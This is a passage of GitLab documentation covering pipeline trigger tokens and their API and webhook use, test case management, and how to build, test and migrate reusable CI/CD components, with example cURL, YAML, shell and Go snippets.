- A [CI/CD job token](../jobs/ci_job_token.md) to [trigger a multi-project pipeline](../pipelines/downstream_pipelines.md#trigger-a-multi-project-pipeline-by-using-the-api).
- Another [token with API access](../../security/tokens/_index.md) to create a new pipeline with the [project pipeline API endpoint](../../api/pipelines.md#create-a-new-pipeline).

## Create a pipeline trigger token

You can trigger a pipeline for a branch or tag by generating a pipeline trigger token and using it to authenticate an API call. The token impersonates a user's project access and permissions.

Prerequisites:

- You must have at least the Maintainer role for the project.

To create a trigger token:

1. On the left sidebar, select **Search or go to** and find your project.
1. Select **Settings > CI/CD**.
1. Expand **Pipeline trigger tokens**.
1. Select **Add new token**.
1. Enter a description and select **Create pipeline trigger token**.
   - You can view and copy the full token for all triggers you have created.
   - You can only see the first 4 characters for tokens created by other project members.
{{< alert type="warning" >}} It is a security risk to save tokens in plain text in public projects, or store them in a way that malicious users could access them. A leaked trigger token could be used to force an unscheduled deployment, attempt to access CI/CD variables, or other malicious uses. [Masked CI/CD variables](../variables/_index.md#mask-a-cicd-variable) help improve the security of trigger tokens. For more information about keeping tokens secure, see the [security considerations](../../security/tokens/_index.md#security-considerations). {{< /alert >}} ## Trigger a pipeline After you [create a pipeline trigger token](#create-a-pipeline-trigger-token), you can use it to trigger pipelines with a tool that can access the API, or a webhook. ### Use cURL You can use cURL to trigger pipelines with the [pipeline triggers API endpoint](../../api/pipeline_triggers.md). For example: - Use a multiline cURL command: ```shell curl --request POST \ --form token=<token> \ --form ref=<ref_name> \ "https://gitlab.example.com/api/v4/projects/<project_id>/trigger/pipeline" ``` - Use cURL and pass the `<token>` and `<ref_name>` in the query string: ```shell curl --request POST \ "https://gitlab.example.com/api/v4/projects/<project_id>/trigger/pipeline?token=<token>&ref=<ref_name>" ``` In each example, replace: - The URL with `https://gitlab.com` or the URL of your instance. - `<token>` with your trigger token. - `<ref_name>` with a branch or tag name, like `main`. - `<project_id>` with your project ID, like `123456`. The project ID is displayed on the [project overview page](../../user/project/working_with_projects.md#find-the-project-id). ### Use a CI/CD job You can use a CI/CD job with a pipeline trigger token to trigger pipelines when another pipeline runs. 
For example, to trigger a pipeline on the `main` branch of `project-B` when a tag is created in `project-A`,
add the following job to `project-A`'s `.gitlab-ci.yml` file:

```yaml
trigger_pipeline:
  stage: deploy
  script:
    - 'curl --fail --request POST --form token=$MY_TRIGGER_TOKEN --form ref=main "${CI_API_V4_URL}/projects/123456/trigger/pipeline"'
  rules:
    - if: $CI_COMMIT_TAG
  environment: production
```

In this example:

- `123456` is the project ID for `project-B`. The project ID is displayed on the
  [project overview page](../../user/project/working_with_projects.md#find-the-project-id).
- The [`rules`](../yaml/_index.md#rules) cause the job to run every time a tag is added to `project-A`.
- `MY_TRIGGER_TOKEN` is a [masked CI/CD variable](../variables/_index.md#mask-a-cicd-variable) that contains the trigger token.

### Use a webhook

To trigger a pipeline from another project's webhook, use a webhook URL like the following
for push and tag events:

```plaintext
https://gitlab.example.com/api/v4/projects/<project_id>/ref/<ref_name>/trigger/pipeline?token=<token>
```

Replace:

- The URL with `https://gitlab.com` or the URL of your instance.
- `<project_id>` with your project ID, like `123456`. The project ID is displayed on the
  [project overview page](../../user/project/working_with_projects.md#find-the-project-id).
- `<ref_name>` with a branch or tag name, like `main`. This value takes precedence over the `ref_name` in the webhook payload.
  The payload's `ref` is the branch that fired the trigger in the source repository.
  You must URL-encode the `ref_name` if it contains slashes.
- `<token>` with your pipeline trigger token.

#### Access webhook payload

If you trigger a pipeline by using a webhook, you can access the webhook payload with
the `TRIGGER_PAYLOAD` [predefined CI/CD variable](../variables/predefined_variables.md).
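For example, a job in the triggered pipeline could print the payload and pull out individual fields. This is a minimal sketch: the job name is illustrative, and `jq` is assumed to be available in the job's image:

```yaml
inspect_trigger_payload:
  stage: test
  rules:
    # Only run when the pipeline was created through the trigger API or a webhook.
    - if: $CI_PIPELINE_SOURCE == "trigger"
  script:
    # TRIGGER_PAYLOAD is a file-type variable, so it holds a path to the payload file.
    - cat "$TRIGGER_PAYLOAD"
    # Extract a single field, for example the ref that fired the webhook.
    - jq -r '.ref' "$TRIGGER_PAYLOAD"
```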
The payload is exposed as a [file-type variable](../variables/_index.md#use-file-type-cicd-variables),
so you can access the data with `cat $TRIGGER_PAYLOAD` or a similar command.

### Pass CI/CD variables in the API call

You can pass any number of [CI/CD variables](../variables/_index.md) in the trigger API call,
though [using inputs to control pipeline behavior](#pass-pipeline-inputs-in-the-api-call)
offers improved security and flexibility over CI/CD variables.

These variables have the [highest precedence](../variables/_index.md#cicd-variable-precedence),
and override all variables with the same name.

The parameter is of the form `variables[key]=value`, for example:

```shell
curl --request POST \
  --form token=TOKEN \
  --form ref=main \
  --form "variables[UPLOAD_TO_S3]=true" \
  "https://gitlab.example.com/api/v4/projects/123456/trigger/pipeline"
```

CI/CD variables in triggered pipelines display on each job's page, but only users with the
Maintainer or Owner role can view the values.

![A configuration panel for a CI trigger for token 4e19 showing UPLOAD_TO_S3 set to true](img/trigger_variables_v11_6.png)

### Pass pipeline inputs in the API call

You can pass pipeline inputs in the trigger API call. [Inputs](../inputs/_index.md) provide
a structured way to parameterize your pipelines with built-in validation and documentation.
The parameter format is `inputs[name]=value`, for example:

```shell
curl --request POST \
  --form token=TOKEN \
  --form ref=main \
  --form "inputs[environment]=production" \
  "https://gitlab.example.com/api/v4/projects/123456/trigger/pipeline"
```

Input values are validated according to the type and constraints defined in your pipeline's `spec:inputs` section:

```yaml
spec:
  inputs:
    environment:
      type: string
      description: "Deployment environment"
      options: [dev, staging, production]
      default: dev
```

## Revoke a pipeline trigger token

To revoke a pipeline trigger token:

1. On the left sidebar, select **Search or go to** and find your project.
1. Select **Settings > CI/CD**.
1. Expand **Pipeline trigger tokens**.
1. To the left of the trigger token you want to revoke, select **Revoke** ({{< icon name="remove" >}}).

A revoked trigger token cannot be added back.

## Configure CI/CD jobs to run in triggered pipelines

To [configure when to run jobs](../jobs/job_control.md) in triggered pipelines, you can:

- Use [`rules`](../yaml/_index.md#rules) with the `$CI_PIPELINE_SOURCE` [predefined CI/CD variable](../variables/predefined_variables.md).
- Use [`only`/`except`](../yaml/deprecated_keywords.md#onlyrefs--exceptrefs) keywords, though `rules` is the preferred keyword.

| `$CI_PIPELINE_SOURCE` value | `only`/`except` keywords | Trigger method |
|-----------------------------|--------------------------|----------------|
| `trigger` | `triggers` | In pipelines triggered with the [pipeline triggers API](../../api/pipeline_triggers.md) by using a [trigger token](#create-a-pipeline-trigger-token). |
| `pipeline` | `pipelines` | In [multi-project pipelines](../pipelines/downstream_pipelines.md#trigger-a-multi-project-pipeline-by-using-the-api) triggered with the [pipeline triggers API](../../api/pipeline_triggers.md) by using the [`$CI_JOB_TOKEN`](../jobs/ci_job_token.md), or by using the [`trigger`](../yaml/_index.md#trigger) keyword in the CI/CD configuration file. |

Additionally, the `$CI_PIPELINE_TRIGGERED` predefined CI/CD variable is set to `true` in pipelines
triggered with a pipeline trigger token.

## See which pipeline trigger token was used

You can see which pipeline trigger token caused a job to run by visiting the single job page.
A part of the trigger token displays on the right sidebar, under **Job details**.

In pipelines triggered with a trigger token, jobs are labeled as `triggered` in **Build > Jobs**.

## Troubleshooting

### `403 Forbidden` when you trigger a pipeline with a webhook

When you trigger a pipeline with a webhook, the API might return a `{"message":"403 Forbidden"}` response.

To avoid trigger loops, do not use [pipeline events](../../user/project/integrations/webhook_events.md#pipeline-events)
to trigger pipelines.

### `404 Not Found` when triggering a pipeline

A response of `{"message":"404 Not Found"}` when triggering a pipeline might be caused by using a
[personal access token](../../user/profile/personal_access_tokens.md) instead of a pipeline trigger token.
[Create a new trigger token](#create-a-pipeline-trigger-token) and use it instead of the personal access token.

A response of `{"message":"404 Not Found"}` might also be caused by using a `GET` request.
Pipelines can only be triggered using a `POST` request.

### `The requested URL returned error: 400` when triggering a pipeline

If you attempt to trigger a pipeline by using a `ref` that is a branch name that doesn't exist,
GitLab returns `The requested URL returned error: 400`.

For example, you might accidentally use `main` for the branch name in a project that uses a
different branch name for its default branch.
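Also verify that a `ref` containing slashes is URL-encoded wherever it appears in a URL, as noted in the webhook section above. For example, one way to encode a ref from the command line (assuming `python3` is available; the ref name is illustrative):

```shell
# URL-encode a ref name before embedding it in a trigger or webhook URL.
# "feature/my-branch" is an example ref; replace it with your own.
REF_NAME="feature/my-branch"
ENCODED_REF=$(python3 -c 'import sys, urllib.parse; print(urllib.parse.quote(sys.argv[1], safe=""))' "$REF_NAME")
echo "$ENCODED_REF"  # feature%2Fmy-branch
```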
Another possible cause for this error is a rule that prevents pipeline creation when the
`CI_PIPELINE_SOURCE` value is `trigger`, such as:

```yaml
rules:
  - if: $CI_PIPELINE_SOURCE == "trigger"
    when: never
```

Review your [`workflow:rules`](../yaml/_index.md#workflowrules) to ensure a pipeline can be created
when the `CI_PIPELINE_SOURCE` value is `trigger`.
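For example, a `workflow:rules` configuration that allows trigger pipelines while keeping branch pipelines for the default branch could look like this (a sketch; adapt the rules to your project):

```yaml
workflow:
  rules:
    # Allow pipelines created through the trigger API or webhooks.
    - if: $CI_PIPELINE_SOURCE == "trigger"
    # Keep running normal branch pipelines for the default branch.
    - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
```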
{{< details >}}

- Tier: Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

Test cases integrate test planning directly into your GitLab workflows. Teams can:

- Document test scenarios in the same platform where they manage code.
- Track test requirements alongside development tasks.
- Share test plans across implementation and testing teams.
- Manage test case visibility with confidential settings.
- Archive and reopen test cases as needed.

Teams use test cases to streamline collaboration between development and testing teams,
which eliminates the need for external test planning tools.

<i class="fa fa-youtube-play youtube" aria-hidden="true"></i>
To learn how to use issues and epics to manage your requirements and testing needs while integrating
with your development workflows, see
[Streamline Software Development: Integrating Requirements, Testing, and Development Workflows](https://www.youtube.com/watch?v=wbfWM4y2VmM).
<!-- Video published on 2024-02-21 -->

## Create a test case

{{< history >}}

- [Changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/169256) the minimum user role from Reporter to Planner in GitLab 17.7.

{{< /history >}}

Prerequisites:

- You must have at least the Planner role.

To create a test case in a GitLab project:

1. On the left sidebar, select **Search or go to** and find your project.
1. Select **Build > Test cases**.
1. Select **New test case**. You are taken to the new test case form. Here you can enter
   the new case's title, [description](../../user/markdown.md), attach a file, and assign
   [labels](../../user/project/labels.md).
1. Select **Submit test case**. You are taken to view the new test case.

## View a test case

You can view all test cases in the project in the test cases list. Filter the test case list
with a search query, including labels or the test case's title.

Prerequisites:

- Non-confidential test case in a public project: You don't have to be a member of the project.
- Non-confidential test case in a private project: You must have at least the Guest role for the project. - Confidential test case (regardless of project visibility): You must have at least the Planner role for the project. To view a test case: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Build > Test cases**. 1. Select the title of the test case you want to view. You are taken to the test case page. ![An example test case page](img/test_case_show_v13_10.png) ## Edit a test case {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/169256) the minimum user role from Reporter to Planner in GitLab 17.7. {{< /history >}} You can edit a test case's title and description. Prerequisites: - You must have at least the Planner role. - Users demoted to the Guest role can continue to edit the test cases they created when they were in the higher role. To edit a test case: 1. [View a test case](#view-a-test-case). 1. Select **Edit title and description** ({{< icon name="pencil" >}}). 1. Edit the test case's title or description. 1. Select **Save changes**. ## Make a test case confidential {{< history >}} - Introduced for [new](https://gitlab.com/gitlab-org/gitlab/-/issues/422121) and [existing](https://gitlab.com/gitlab-org/gitlab/-/issues/422120) test cases in GitLab 16.5. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/169256) the minimum user role from Reporter to Planner in GitLab 17.7. {{< /history >}} If you're working on a test case that contains private information, you can make it confidential. Prerequisites: - You must have at least the Planner role. To make a test case confidential: - When you [create a test case](#create-a-test-case): under **Confidentiality**, select the **This test case is confidential** checkbox. - When you [edit a test case](#edit-a-test-case): on the right sidebar, next to **Confidentiality**, select **Edit**, then select **Turn on**. 
You can also use the `/confidential` [quick action](../../user/project/quick_actions.md)
when creating a new test case or editing an existing one.

## Archive a test case

{{< history >}}

- [Changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/169256) the minimum user role from Reporter to Planner in GitLab 17.7.

{{< /history >}}

When you want to stop using a test case, you can archive it. You can
[reopen an archived test case](#reopen-an-archived-test-case) later.

Prerequisites:

- You must have at least the Planner role.

To archive a test case, on the test case's page, select **Archive test case**.

To view archived test cases:

1. On the left sidebar, select **Search or go to** and find your project.
1. Select **Build > Test cases**.
1. Select **Archived**.

## Reopen an archived test case

{{< history >}}

- [Changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/169256) the minimum user role from Reporter to Planner in GitLab 17.7.

{{< /history >}}

If you decide to start using an archived test case again, you can reopen it.

Prerequisites:

- You must have at least the Planner role.

To reopen an archived test case:

1. [View a test case](#view-a-test-case).
1. Select **Reopen test case**.
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} ## Test a component Depending on a component's functionality, [testing the component](_index.md#test-the-component) might require additional files in the repository. For example, a component which lints, builds, and tests software in a specific programming language requires actual source code samples. You can have source code examples, configuration files, and similar in the same repository. For example, the Code Quality CI/CD component's has several [code samples for testing](https://gitlab.com/components/code-quality/-/tree/main/src). ### Example: Test a Rust language CI/CD component Depending on a component's functionality, [testing the component](_index.md#test-the-component) might require additional files in the repository. The following "hello world" example for the Rust programming language uses the `cargo` tool chain for simplicity: 1. Go to the CI/CD component root directory. 1. Initialize a new Rust project by using the `cargo init` command. ```shell cargo init ``` The command creates all required project files, including a `src/main.rs` "hello world" example. This step is sufficient to build the Rust source code in a component job with `cargo build`. ```plaintext tree . ├── Cargo.toml ├── LICENSE.md ├── README.md ├── src │ └── main.rs └── templates └── build.yml ``` 1. Ensure that the component has a job to build the Rust source code, for example, in `templates/build.yml`: ```yaml spec: inputs: stage: default: build description: 'Defines the build stage' rust_version: default: latest description: 'Specify the Rust version, use values from https://hub.docker.com/_/rust/tags Defaults to latest' --- "build-$[[ inputs.rust_version ]]": stage: $[[ inputs.stage ]] image: rust:$[[ inputs.rust_version ]] script: - cargo build --verbose ``` In this example: - The `stage` and `rust_version` inputs can be modified from their default values. 
   - The CI/CD job starts with a `build-` prefix and dynamically creates the name based on the `rust_version` input.
   - The command `cargo build --verbose` compiles the Rust source code.

1. Test the component's `build` template in the project's `.gitlab-ci.yml` configuration file:

   ```yaml
   include:
     # include the component located in the current project from the current SHA
     - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/build@$CI_COMMIT_SHA
       inputs:
         stage: build

   stages: [build, test, release]
   ```

1. To run tests, add functions and tests to the Rust code, then add a component template and job that runs `cargo test` in `templates/test.yml`:

   ```yaml
   spec:
     inputs:
       stage:
         default: test
         description: 'Defines the test stage'
       rust_version:
         default: latest
         description: 'Specify the Rust version, use values from https://hub.docker.com/_/rust/tags Defaults to latest'
   ---

   "test-$[[ inputs.rust_version ]]":
     stage: $[[ inputs.stage ]]
     image: rust:$[[ inputs.rust_version ]]
     script:
       - cargo test --verbose
   ```

1. Test the additional job in the pipeline by including the `test` component template:

   ```yaml
   include:
     # include the component located in the current project from the current SHA
     - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/build@$CI_COMMIT_SHA
       inputs:
         stage: build
     - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/test@$CI_COMMIT_SHA
       inputs:
         stage: test

   stages: [build, test, release]
   ```

## CI/CD component patterns

This section provides practical examples of implementing common patterns in CI/CD components.

### Use boolean inputs to conditionally configure jobs

You can switch a job between two configurations by combining `boolean` type inputs and [`extends`](../yaml/_index.md#extends) functionality.
For example, to configure complex caching behavior with a `boolean` input:

```yaml
spec:
  inputs:
    enable_special_caching:
      description: 'If set to `true` configures a complex caching behavior'
      type: boolean
---

.my-component:enable_special_caching:false:
  extends: null

.my-component:enable_special_caching:true:
  cache:
    policy: pull-push
    key: $CI_COMMIT_SHA
    paths: [...]

my-job:
  extends: '.my-component:enable_special_caching:$[[ inputs.enable_special_caching ]]'
  script: ... # run some fancy tooling
```

This pattern works by passing the `enable_special_caching` input into the `extends` keyword of the job. Depending on whether `enable_special_caching` is `true` or `false`, the appropriate configuration is selected from the predefined hidden jobs (`.my-component:enable_special_caching:true` or `.my-component:enable_special_caching:false`).

### Use `options` to conditionally configure jobs

You can compose jobs with multiple options, for behavior similar to `if` and `elseif` conditionals. Use [`extends`](../yaml/_index.md#extends) with a `string` type input and multiple `options` for any number of conditions.

For example, to configure complex caching behavior with 3 different options:

```yaml
spec:
  inputs:
    cache_mode:
      description: Defines the caching mode to use for this component
      type: string
      options:
        - default
        - aggressive
        - relaxed
---

.my-component:cache_mode:default:
  extends: null

.my-component:cache_mode:aggressive:
  cache:
    policy: push
    key: $CI_COMMIT_SHA
    paths: ['*/**']

.my-component:cache_mode:relaxed:
  cache:
    policy: pull-push
    key: $CI_COMMIT_BRANCH
    paths: ['bin/*']

my-job:
  extends: '.my-component:cache_mode:$[[ inputs.cache_mode ]]'
  script: ... # run some fancy tooling
```

In this example, the `cache_mode` input offers `default`, `aggressive`, and `relaxed` options, each corresponding to a different hidden job.
By extending the component job with `extends: '.my-component:cache_mode:$[[ inputs.cache_mode ]]'`, the job dynamically inherits the correct caching configuration based on the selected option.

## CI/CD component migration examples

This section shows practical examples of migrating CI/CD templates and pipeline configuration into reusable CI/CD components.

### CI/CD component migration example: Go

A complete pipeline for the software development lifecycle can be composed with multiple jobs and stages. CI/CD templates for programming languages may provide multiple jobs in a single template file. As an exercise, migrate the following Go CI/CD template:

```yaml
default:
  image: golang:latest

stages:
  - test
  - build
  - deploy

format:
  stage: test
  script:
    - go fmt $(go list ./... | grep -v /vendor/)
    - go vet $(go list ./... | grep -v /vendor/)
    - go test -race $(go list ./... | grep -v /vendor/)

compile:
  stage: build
  script:
    - mkdir -p mybinaries
    - go build -o mybinaries ./...
  artifacts:
    paths:
      - mybinaries
```

{{< alert type="note" >}}

For a more incremental approach, migrate one job at a time. Start with the `build` job, then repeat the steps for the `format` and `test` jobs.

{{< /alert >}}

The CI/CD template migration involves the following steps:

1. Analyze the CI/CD jobs and dependencies, and define migration actions:
   - The `image` configuration is global and [needs to be moved into the job definitions](_index.md#avoid-using-global-keywords).
   - The `format` job runs multiple `go` commands in one job. The `go test` command should be moved into a separate job to increase pipeline efficiency.
   - The `compile` job runs `go build` and should be renamed to `build`.

1. Define optimization strategies for better pipeline efficiency:
   - The `stage` job attribute should be configurable to allow different CI/CD pipeline consumers.
   - The `image` key uses a hardcoded image tag `latest`.
     Add [`golang_version` as input](../inputs/_index.md) with `latest` as the default value for more flexible and reusable pipelines. The input must match the Docker Hub image tag values.
   - The `compile` job builds the binaries into a hard-coded target directory `mybinaries`, which can be enhanced with a dynamic [input](../inputs/_index.md) and default value `mybinaries`.

1. Create a template [directory structure](_index.md#directory-structure) for the new component, based on one template for each job:
   - The name of each template should follow the `go` command it runs, for example `format.yml`, `build.yml`, and `test.yml`.
   - Create a new project, initialize a Git repository, add and commit all changes, set a remote origin, and push. Modify the URL for your CI/CD component project path.
   - Create additional files as outlined in the guidance to [write a component](_index.md#write-a-component): `README.md`, `LICENSE.md`, `.gitlab-ci.yml`, `.gitignore`.

   The following shell commands initialize the Go component structure:

   ```shell
   git init
   mkdir templates
   touch templates/{format,build,test}.yml
   touch README.md LICENSE.md .gitlab-ci.yml .gitignore
   git add -A
   git commit -avm "Initial component structure"
   git remote add origin https://gitlab.example.com/components/golang.git
   git push
   ```

1. Create the CI/CD jobs as templates. Start with the `build` job:
   - Define the following inputs in the `spec` section: `stage`, `golang_version`, and `binary_directory`.
   - Add a dynamic job name definition, accessing `inputs.golang_version`.
   - Use a similar pattern for dynamic Go image versions, accessing `inputs.golang_version`.
   - Assign the stage to the `inputs.stage` value.
   - Create the binary directory from `inputs.binary_directory` and add it as a parameter to `go build`.
   - Define the artifacts path to `inputs.binary_directory`.
   ```yaml
   spec:
     inputs:
       stage:
         default: 'build'
         description: 'Defines the build stage'
       golang_version:
         default: 'latest'
         description: 'Go image version tag'
       binary_directory:
         default: 'mybinaries'
         description: 'Output directory for created binary artifacts'
   ---

   "build-$[[ inputs.golang_version ]]":
     image: golang:$[[ inputs.golang_version ]]
     stage: $[[ inputs.stage ]]
     script:
       - mkdir -p $[[ inputs.binary_directory ]]
       - go build -o $[[ inputs.binary_directory ]] ./...
     artifacts:
       paths:
         - $[[ inputs.binary_directory ]]
   ```

   - The `format` job template follows the same patterns, but only requires the `stage` and `golang_version` inputs:

     ```yaml
     spec:
       inputs:
         stage:
           default: 'format'
           description: 'Defines the format stage'
         golang_version:
           default: 'latest'
           description: 'Golang image version tag'
     ---

     "format-$[[ inputs.golang_version ]]":
       image: golang:$[[ inputs.golang_version ]]
       stage: $[[ inputs.stage ]]
       script:
         - go fmt $(go list ./... | grep -v /vendor/)
         - go vet $(go list ./... | grep -v /vendor/)
     ```

   - The `test` job template follows the same patterns, but only requires the `stage` and `golang_version` inputs:

     ```yaml
     spec:
       inputs:
         stage:
           default: 'test'
           description: 'Defines the test stage'
         golang_version:
           default: 'latest'
           description: 'Golang image version tag'
     ---

     "test-$[[ inputs.golang_version ]]":
       image: golang:$[[ inputs.golang_version ]]
       stage: $[[ inputs.stage ]]
       script:
         - go test -race $(go list ./... | grep -v /vendor/)
     ```

1. To test the component, modify the `.gitlab-ci.yml` configuration file, and add [tests](_index.md#test-the-component):
   - Specify a different value for `golang_version` as input for the `build` job.
   - Modify the URL for your CI/CD component path.
   ```yaml
   stages: [format, build, test]

   include:
     - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/format@$CI_COMMIT_SHA
     - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/build@$CI_COMMIT_SHA
     - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/build@$CI_COMMIT_SHA
       inputs:
         golang_version: "1.21"
     - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/test@$CI_COMMIT_SHA
       inputs:
         golang_version: latest
   ```

1. Add Go source code to test the CI/CD component. The `go` commands expect a Go project with `go.mod` and `main.go` in the root directory.
   - Initialize the Go modules. Modify the URL for your CI/CD component path.

     ```shell
     go mod init example.gitlab.com/components/golang
     ```

   - Create a `main.go` file with a main function, for example printing `Hello, CI/CD Component`. You can use code comments to generate Go code using [GitLab Duo Code Suggestions](../../user/project/repository/code_suggestions/_index.md).

     ```go
     // Specify the package, import required packages
     // Create a main function
     // Inside the main function, print "Hello, CI/CD Component"
     package main

     import "fmt"

     func main() {
         fmt.Println("Hello, CI/CD Component")
     }
     ```

   - The directory tree should look as follows:

     ```plaintext
     tree
     .
     ├── LICENSE.md
     ├── README.md
     ├── go.mod
     ├── main.go
     └── templates
         ├── build.yml
         ├── format.yml
         └── test.yml
     ```

Follow the remaining steps in the [converting a CI/CD template into a component](_index.md#convert-a-cicd-template-to-a-component) section to complete the migration:

1. Commit and push the changes, and verify the CI/CD pipeline results.
1. Follow the guidance on [writing a component](_index.md#write-a-component) to update the `README.md` and `LICENSE.md` files.
1. [Release the component](_index.md#publish-a-new-release) and verify it in the CI/CD catalog.
1. Add the CI/CD component into your staging/production environment.
The [GitLab-maintained Go component](https://gitlab.com/components/go) provides an example of a successful migration from a Go CI/CD template, enhanced with inputs and component best practices. You can inspect its Git history to learn more.
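After the migrated component is released, consumers can pin a published version instead of a commit SHA. The following sketch assumes the hypothetical project path `gitlab.example.com/components/golang` used in the setup commands above and a published `1.0.0` release:

```yaml
stages: [format, build, test]

include:
  # Hypothetical catalog path and version, matching the remote used earlier
  - component: gitlab.example.com/components/golang/format@1.0.0
  - component: gitlab.example.com/components/golang/build@1.0.0
    inputs:
      golang_version: "1.21"
      binary_directory: mybinaries
  - component: gitlab.example.com/components/golang/test@1.0.0
```

Because `stage`, `golang_version`, and `binary_directory` all have defaults, consumers only need to set the inputs they want to change.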
---
stage: Verify
group: Pipeline Authoring
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: CI/CD components
description: Reusable, versioned CI/CD components for pipelines.
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< history >}}

- Introduced as an [experimental feature](../../policy/development_stages_support.md#experiment) in GitLab 16.0, [with a flag](../../administration/feature_flags/_index.md) named `ci_namespace_catalog_experimental`. Disabled by default.
- [Enabled on GitLab.com and GitLab Self-Managed](https://gitlab.com/groups/gitlab-org/-/epics/9897) in GitLab 16.2.
- [Feature flag `ci_namespace_catalog_experimental` removed](https://gitlab.com/gitlab-org/gitlab/-/issues/394772) in GitLab 16.3.
- [Moved](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/130824) to [beta](../../policy/development_stages_support.md#beta) in GitLab 16.6.
- [Made generally available](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/134062) in GitLab 17.0.

{{< /history >}}

A CI/CD component is a reusable single pipeline configuration unit. Use components to create a small part of a larger pipeline, or even to compose a complete pipeline configuration.

A component can be configured with [input parameters](../inputs/_index.md) for more dynamic behavior.

CI/CD components are similar to the other kinds of [configuration added with the `include` keyword](../yaml/includes.md), but have several advantages:

- Components can be listed in the [CI/CD Catalog](#cicd-catalog).
- Components can be released and used with a specific version.
- Multiple components can be defined in the same project and versioned together.

Instead of creating your own components, you can also search for published components that have the functionality you need in the [CI/CD Catalog](#cicd-catalog).

<i class="fa fa-youtube-play youtube" aria-hidden="true"></i>
For an introduction and hands-on examples, see [Efficient DevSecOps workflows with reusable CI/CD components](https://www.youtube.com/watch?v=-yvfSFKAgbA).
<!-- Video published on 2024-01-22.
DRI: Developer Relations, https://gitlab.com/groups/gitlab-com/marketing/developer-relations/-/epics/399 -->

For common questions and additional support, see the [FAQ: GitLab CI/CD Catalog](https://about.gitlab.com/blog/2024/08/01/faq-gitlab-ci-cd-catalog/) blog post.

## Component project

{{< history >}}

- The maximum number of components per project [changed](https://gitlab.com/gitlab-org/gitlab/-/issues/436565) from 10 to 30 in GitLab 16.9.

{{< /history >}}

A component project is a GitLab project with a repository that hosts one or more components. All components in the project are versioned together, with a maximum of 30 components per project.

If a component requires different versioning from other components, the component should be moved to a dedicated component project.

### Create a component project

To create a component project, you must:

1. [Create a new project](../../user/project/_index.md#create-a-blank-project) with a `README.md` file:
   - Ensure the description gives a clear introduction to the component.
   - Optional. After the project is created, you can [add a project avatar](../../user/project/working_with_projects.md#add-a-project-avatar).

   Components published to the [CI/CD catalog](#cicd-catalog) use both the description and avatar when displaying the component project's summary.

1. Add a YAML configuration file for each component, following the [required directory structure](#directory-structure). For example:

   ```yaml
   spec:
     inputs:
       stage:
         default: test
   ---

   component-job:
     script: echo job 1
     stage: $[[ inputs.stage ]]
   ```

You can [use the component](#use-a-component) immediately, but you might want to consider publishing the component to the [CI/CD catalog](#cicd-catalog).

### Directory structure

The repository must contain:

- A `README.md` Markdown file documenting the details of all the components in the repository.
- A top level `templates/` directory that contains all the component configurations.
  In this directory:

  - For simple components, use single files ending in `.yml` for each component, like `templates/secret-detection.yml`.
  - For complex components, create subdirectories with a `template.yml` for each component, like `templates/secret-detection/template.yml`.
    Only the `template.yml` file is used by other projects using the component. Other files in these directories are not released with the component, but can be used for things like tests or building container images.

{{< alert type="note" >}}

Optionally, each component can also have its own `README.md` file that provides more detailed information, and can be linked from the top-level `README.md` file. This helps to provide a better overview of your component project and how to use it.

{{< /alert >}}

You should also:

- Configure the project's `.gitlab-ci.yml` to [test the components](#test-the-component) and [release new versions](#publish-a-new-release).
- Add a `LICENSE.md` file with a license of your choice that covers the usage of your component. For example the [MIT](https://opensource.org/license/mit) or [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0#apply) open source licenses.

For example:

- If the project contains a single component, the directory structure should be similar to:

  ```plaintext
  ├── templates/
  │   └── my-component.yml
  ├── LICENSE.md
  ├── README.md
  └── .gitlab-ci.yml
  ```

- If the project contains multiple components, then the directory structure should be similar to:

  ```plaintext
  ├── templates/
  │   ├── my-simple-component.yml
  │   └── my-complex-component/
  │       ├── template.yml
  │       ├── Dockerfile
  │       └── test.sh
  ├── LICENSE.md
  ├── README.md
  └── .gitlab-ci.yml
  ```

  In this example:

  - The `my-simple-component` component's configuration is defined in a single file.
  - The `my-complex-component` component's configuration contains multiple files in a directory.
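The project's `.gitlab-ci.yml` mentioned above typically does two things: include the component from the current commit to test it, and create a release when a tag is pushed. A minimal sketch, assuming a component named `my-component` exists under `templates/` and accepts a `stage` input:

```yaml
stages: [test, release]

include:
  # Test the component from the current commit, before any release exists
  - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/my-component@$CI_COMMIT_SHA
    inputs:
      stage: test

create-release:
  stage: release
  image: registry.gitlab.com/gitlab-org/release-cli:latest
  rules:
    # Only create a release when a tag is pushed
    - if: $CI_COMMIT_TAG
  script: echo "Creating release $CI_COMMIT_TAG"
  release:
    tag_name: $CI_COMMIT_TAG
    description: "Release $CI_COMMIT_TAG of components in $CI_PROJECT_PATH"
```

The component name, stage names, and release description here are illustrative; adapt them to your project.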
## Use a component

Prerequisites:

If you are a member of a parent group that contains the current group or project:

- You must have the minimum role set by the visibility level of the project's parent group. For example, you must have at least the Reporter role if a parent project is set to **Private**.

To add a component to a project's CI/CD configuration, use the [`include: component`](../yaml/_index.md#includecomponent) keyword. The component reference is formatted as `<fully-qualified-domain-name>/<project-path>/<component-name>@<specific-version>`, for example:

```yaml
include:
  - component: $CI_SERVER_FQDN/my-org/security-components/secret-detection@1.0.0
    inputs:
      stage: build
```

In this example:

